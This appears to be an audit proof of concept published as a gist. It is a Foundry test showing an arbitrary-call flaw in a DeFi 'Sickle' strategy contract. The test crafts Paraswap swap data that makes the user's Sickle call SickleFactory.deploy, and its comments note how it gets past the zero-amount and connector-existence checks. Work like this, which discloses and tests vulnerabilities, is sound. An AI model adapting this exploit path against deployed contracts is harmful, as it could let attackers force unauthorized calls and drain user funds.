@DrasticWatermelon
Last active April 26, 2024 06:44
ArbitraryCallPoC.sol
1. Add the test case to `test/strategies/PrismaConnector.t.sol`
2. Execute with `forge t --mt test_ArbitraryCallPOC -vvv`
At the end, the test asserts that the user's Sickle is now an owner of a Sickle.
function test_ArbitraryCallPOC() external prank {
    CurvePool[] memory curvePools = getCurvePools();
    whitelistCurve(curvePools);

    vm.startPrank(sickleOwner);

    ParaswapExtraData memory payload = ParaswapExtraData({
        target: address(ctx.factory),
        data: abi.encodeCall(SickleFactory.deploy, (address(0xdeadbeef), bytes32(hex"abcdabcd")))
    });

    // 1. Create call params to target ParaswapConnector
    SwapData[] memory swap = new SwapData[](1);
    swap[0] = SwapData({
        router: Mainnet.PARASWAP_TOKEN_TRANSFER_PROXY,
        tokenIn: Mainnet.WETH, // AUDIT not important
        amountIn: 1, // AUDIT needs to bypass the zero check
        minAmountOut: 0, // AUDIT not important
        extraData: abi.encode(payload)
    });

    ZapModule.ZapOutData memory zapData = ZapModule.ZapOutData({
        removeLiquidityData: RemoveLiquidityData({
            router: address(0),
            lpToken: address(0),
            tokens: new address[](0),
            lpAmountIn: 0,
            minAmountsOut: new uint256[](0),
            extraData: ""
        }),
        swaps: swap, // TODO this is important for the exploit
        tokenOut: ETH
    });

    // 2. Execute farmStrategy.harvest(pool, harvestData, "")
    farmStrategy.harvest(
        curvePools[0].pool, // AUDIT sets a random, registered, target to bypass connector existence check
        zapData,
        ""
    );

    // 3. Verify the Sickle is owner of a Sickle
    address usersSickle = ctx.factory.sickles(sickleOwner);
    assertTrue(usersSickle != address(0), "User isn't admin of a sickle");

    address sicklesSickle = ctx.factory.sickles(usersSickle);
    assertTrue(sicklesSickle != address(0), "Sickles isn't admin of a sickle");
}